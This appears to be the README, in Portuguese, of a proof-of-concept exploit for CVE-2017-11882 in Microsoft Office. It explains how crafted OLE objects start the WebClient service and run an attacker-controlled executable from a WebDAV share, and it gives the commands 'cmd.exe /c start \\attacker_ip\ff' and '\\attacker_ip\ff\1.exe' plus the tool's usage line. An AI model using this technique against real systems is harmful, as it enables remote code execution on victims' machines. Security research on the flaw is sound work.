
Exploits de prova de conceito para CVE-2017-11882
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
Pesquisa: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
Análise de patch: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
Demonstração de exploração PoC: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
Um PoC simples para CVE-2017-11882. Este exploit aciona o serviço WebClient para iniciar e executar um arquivo remoto de um servidor WebDav controlado pelo atacante. A razão pela qual essa abordagem pode ser útil é uma limitação no comprimento do comando executado. No entanto, com a ajuda do WebDav, é possível lançar um executável arbitrário controlado pelo atacante na máquina vulnerável. Este script cria um documento simples com vários objetos OLE. Esses objetos exploram CVE-2017-11882, o que resulta na execução sequencial de comandos.
O primeiro comando que aciona o início do serviço WebClient pode ser assim:
cmd.exe /c start \\attacker_ip\ff
O caminho do binário controlado pelo atacante deve ser um caminho de rede UNC:
\\attacker_ip\ff\1.exe
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
A pasta example contém um arquivo .rtf que explora a vulnerabilidade CVE-2017-11882 e executa a calculadora no sistema.